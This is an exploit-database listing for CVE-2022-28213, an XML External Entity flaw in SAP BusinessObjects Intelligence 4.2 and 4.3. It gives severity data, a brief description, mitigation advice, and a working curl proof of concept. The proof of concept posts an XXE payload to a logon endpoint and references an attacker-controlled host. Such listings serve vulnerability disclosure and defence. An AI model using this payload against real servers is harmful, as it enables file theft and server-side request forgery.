header-logo
Suggest Exploit
vendor:
BusinessObjects Intelligence
by:
West Shepherd
8.1
CVSS
HIGH
XML External Entity (XXE)
611
CWE
Product Name: BusinessObjects Intelligence
Affected Version From: 4.2
Affected Version To: 4.3
Patch Exists: YES
Related CWE: CVE-2022-28213
CPE: a:sap:businessobjects_intelligence:4.3
Metasploit:
Other Scripts:
Platforms Tested: Windows Server 2019 x64
2022

SAP BusinessObjects Intelligence 4.3 – XML External Entity (XXE)

SAP BusinessObjects Intelligence 4.3 is vulnerable to XML External Entity (XXE) attacks. An attacker can send a specially crafted XML request to the application, which can then be used to read arbitrary files on the server or perform remote requests. The attacker can also use the XXE vulnerability to perform server-side request forgery (SSRF) attacks.

Mitigation:

The application should be configured to disable XML external entity (XXE) processing. The application should also be configured to disable DTDs (Document Type Definitions) completely.
Source

Exploit-DB raw data:

# Exploit Title: SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE)
# Google Dork: N/A
# Date: 4/21/2022
# Exploit Author: West Shepherd
# Vendor Homepage: https://www.sap.com/
# Software Link: https://www.sap.com/
# Version: 4.2 and 4.3
# Tested on: Windows Server 2019 x64
# CVE : CVE-2022-28213
# References: https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md

curl -sk -X POST -H 'Content-Type: application/xml;charset=UTF-8' \
--data '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY %
remote SYSTEM "\\attackerwebsite.com\XXE\example">%remote;%int;%trick;]>' \
https://example.com/biprws/logon/long

Navigation

Suggest Exploit

Services By CQR